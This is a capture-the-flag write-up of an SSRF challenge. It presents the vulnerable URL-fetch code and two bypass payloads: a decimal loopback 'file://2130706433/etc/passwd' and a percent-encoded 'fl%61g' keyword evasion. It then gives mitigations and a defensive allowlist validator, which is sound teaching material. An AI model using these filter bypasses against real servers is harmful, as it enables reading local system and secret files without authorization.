
Windows 12 - DOJO n°33

📜 Description

We’ve had the honor of trying out a new computer in the office! Seems we got a nice welcome message when we started the computer, wonder what else there is to find?

The flag can be found in the file: /tmp/secrets/flag.txt

Note: The docker application does not have access to the internet

🕵️ Proof of Concept

The application lets us open an http/https URL and return its content, or read a local file inside /tmp/app/files/. Path traversal is not possible because every "../" is stripped by filename.replace("../", "") in a loop, so nested forms like "....//" are removed as well:

```python
import re
from urllib.request import urlopen

# Excerpt of the challenge's request handler: `filename` comes from the request,
# validate() is shown below.
content, errMsg = "", ""
if len(filename) > 0:
    # Strip every "../" until none is left
    while "../" in filename:
        filename = filename.replace("../", "")

    if validate(filename) == True:
        try:
            # Anything shaped like "scheme://" goes to urlopen(), which also serves file:// URLs
            if re.search(r'^[a-zA-Z]+://', filename):
                content = urlopen(filename, timeout=2).read().decode('utf-8')
            else:
                with open("files/"+filename, 'r') as f:
                    content = f.read()
        except:
            errMsg = "File not found"
    else:
        errMsg = "Access denied"
else:
    with open("files/welcome.txt", 'r') as f:
        content = f.read()
```

The validate() function blocks the file:/// scheme, absolute paths, and any target containing "127" or "localhost":

```python
def validate(f) -> bool:
    f = f.lower()
    # "file:///" is too dangerous to use:
    if f.startswith("/") or f.startswith("file:///"):
        return False
    # Filter localhost
    elif ("127" in f) or ("localhost" in f):
        return False
    else:
        return True
```

But the check can be bypassed with the decimal form of the loopback address: file://2130706433/ is the same as file://127.0.0.1/, yet the string contains neither "127" nor a leading "file:///", so validate() returns True and urlopen() reads the local file:

```text
file://2130706433/etc/passwd
```

The "AV" blocks any request containing the word "flag", but we can percent-encode one letter of it, which the filter does not decode:

```text
file://2130706433/tmp/secrets/fl%61g.txt
```

Thanks Brumens for this challenge

🚧 Impacts

An SSRF vulnerability can have a low to severe impact on your application by allowing an attacker to:

- Perform exploitation and/or reconnaissance of internal services.
- Use your server to perform malicious actions (like exploiting servers in the wild).
- Leak secret files or variables (like AWS secret keys).
- …

🔐 Mitigations

Try to avoid this kind of functionality. If you cannot, use a restricted whitelist on the protocol scheme and/or domains (example: ^(http|https)://example.com/[a-zA-Z0-9-/.?&#=]*$). Be aware of filter bypasses like https://expected-host@evil-host, where a regex anchored on the expected host name still matches while the request actually goes to evil-host.
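As an added example (my code, not the challenge's or the author's), here is the mitigation above applied to the two bypasses from the proof of concept: the decimal-IP host and the percent-encoded keyword. The validator canonicalizes the URL first (percent-decode, parse with urlsplit) and then applies allowlists on scheme, host and port, so neither trick survives. `page_validate` reproduces the challenge's validate() for comparison; `ALLOWED_HOSTS`, `check_url`, `parse_ip_literal` and `keyword_hit` are names I chose for this demonstration, and example.com is a placeholder allowlist entry.

```python
import ipaddress
from typing import Optional, Tuple
from urllib.parse import unquote, urlsplit

# Demonstration allowlists (constructed for this example).
ALLOWED_HOSTS = {"example.com"}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = (None, 80, 443)
BLOCKED_WORDS = ("flag",)  # stands in for the challenge's keyword filter


def page_validate(f: str) -> bool:
    """The challenge's original check, reproduced so the two can be compared."""
    f = f.lower()
    if f.startswith("/") or f.startswith("file:///"):
        return False
    if ("127" in f) or ("localhost" in f):
        return False
    return True


def parse_ip_literal(host: str) -> Optional[ipaddress._BaseAddress]:
    """Return an address object if `host` is any spelling of an IP literal:
    dotted ("127.0.0.1"), bracketed IPv6 ("[::1]"), or a bare integer in
    decimal ("2130706433"), hex ("0x7f000001") or leading-zero octal.
    Returns None for anything that is not an IP literal."""
    h = host.strip("[]")
    try:
        return ipaddress.ip_address(h)
    except ValueError:
        pass
    try:
        if h.isdigit():
            # inet_aton treats a leading zero as octal, so mirror that here
            n = int(h, 8) if (h.startswith("0") and len(h) > 1) else int(h, 10)
        else:
            n = int(h, 0)  # handles "0x7f000001"
    except ValueError:
        return None
    try:
        return ipaddress.ip_address(n)
    except ValueError:
        return None


def keyword_hit(url: str, words=BLOCKED_WORDS) -> bool:
    """Keyword check done on the decoded string, so "fl%61g" is seen as "flag"."""
    decoded = unquote(url).lower()
    return any(w in decoded for w in words)


def check_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> Tuple[bool, str]:
    """Return (ok, reason). Canonicalize first, then allowlist; never blocklist substrings."""
    parts = urlsplit(unquote(url))
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    # "https://expected-host@evil-host": the part before '@' is userinfo, not the host
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = (parts.hostname or "").lower()
    ip = parse_ip_literal(host)
    if ip is not None:
        return False, f"ip literal {ip} not allowed"
    if host not in allowed_hosts:
        return False, f"host {host!r} not in allowlist"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    return True, "ok"


if __name__ == "__main__":
    samples = [
        "file://2130706433/etc/passwd",
        "file://2130706433/tmp/secrets/fl%61g.txt",
        "https://expected-host@evil-host/",
        "http://0x7f000001/",
        "https://example.com/a?b=1",
    ]
    for s in samples:
        ok, why = check_url(s)
        print(f"{s:45} page_validate={page_validate(s)!s:5} "
              f"keyword_hit={keyword_hit(s)!s:5} check_url={ok} ({why})")
```

The host allowlist is the real control here; `parse_ip_literal` only exists to show why a substring test like `"127" in f` cannot work, since the same address has many spellings. A production fetcher should additionally resolve the host at request time and re-check the resolved address (DNS rebinding), and tell the HTTP client not to follow redirects, since a redirect is just another way to reach a host that was never validated.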

📚 References

PortSwigger - Server-side request forgery (SSRF)